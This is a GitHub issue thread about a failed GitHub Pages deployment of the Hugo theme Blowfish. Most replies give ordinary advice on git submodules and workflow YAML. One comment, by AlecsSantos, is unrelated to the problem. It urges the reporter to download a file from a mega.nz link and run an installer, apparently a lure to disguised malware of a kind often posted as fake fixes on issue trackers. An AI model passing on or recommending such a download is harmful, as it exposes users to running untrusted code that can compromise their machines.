### ISSUE TITLE
Can't host on Github pages

### ISSUE THREAD

**Issue by pleasehavepatienceimnew** [nunocoracao/blowfish#1703]
**Describe the bug**
When I push the repo on Github this is the action error I get

```Error: failed to load modules: module "blowfish" not found in "/home/runner/work/try-no.556/blowfish"; either add it as a Hugo Module or store it in "/home/runner/work/try-no.556".: module does not exist```

**To Reproduce**
1. Go to 'Actions'
2. Click on 'pages build and deployment'
3. 2. Click on 'build'

**Expected behavior**

I expected the the action to run and finish so gh-pages.yml can work

**Screenshots**
None
**Desktop (please complete the following information):**
 - OS: [Windows 11 PRO 23H2]
 - Browser [Brave]
 - Version [v 1.69.153]

**Hugo & Blowfish versions**

hugo v0.133.0 & blowfish-2.75.0

**Additional context**
I am running blowfish on manual install and followed all the steps done in the documentation

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ragibson** [comment]
> I am running blowfish on manual install and followed all the steps done in the documentation
This sounds like you've just installed blowfish locally? You'll need to include Blowfish setup / submodule checkout in the CI configuration.

**Comment by pleasehavepatienceimnew** [comment]
> This sounds like you've just installed blowfish locally? You'll need to include Blowfish setup / submodule checkout in the CI configuration.

I uploaded to github and followed the instructions for it. It doesn't say I need to do the blowfish setup or the submodule

**Comment by ragibson** [comment]
Did you follow the hosting and deployment documentation page? Perhaps it's
out of date

**Comment by ragibson** [comment]
Just tested out the installation -> hosting & deployment instructions on a new site from scratch and they all appear to work fine.

Note that this part is assuming that you are using a git submodule
```yaml
    steps:
      - name: Checkout
        uses: actions/checkout@v3
        with:
          submodules: true
          fetch-depth: 0
```

**Comment by pleasehavepatienceimnew** [comment]
> Just tested out the installation -> hosting & deployment instructions on a new site from scratch and they all appear to work fine.
> 
> Note that this part is assuming that you are using a git submodule
> 


When I tried using the submodules it wouldn't let me upload it to github without forking the submodule. Did you have to make a fork and add to to the repo? 

I tried looking at your repos, I can see that you have the website but I am not sure how you recreated it.

Any advice would be helpful

**Comment by ragibson** [comment]
Try removing `themes/blowfish` and then running `git submodule add -b main https://github.com/nunocoracao/blowfish.git themes/blowfish`

**Comment by pleasehavepatienceimnew** [comment]
I just tried that on my 'fresh' repo. I have the gh-pages.yml in the actions folder but it doesn't show up in the branch options in the pages settings.

**Comment by pleasehavepatienceimnew** [comment]
I'll try to do a clean one using the submodule later and see how it goes.

**Comment by ragibson** [comment]
The default one has it deploying to the `gh-pages` branch, so you'd have to create it or change that
```yaml
      - name: Deploy
        uses: peaceiris/actions-gh-pages@v3
        if: ${{ github.ref == 'refs/heads/main' }}
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          publish_branch: gh-pages
          publish_dir: ./public
```

I think you also have to give the actions bot permission to push tags/commits in the repo settings with the way they have it set up.
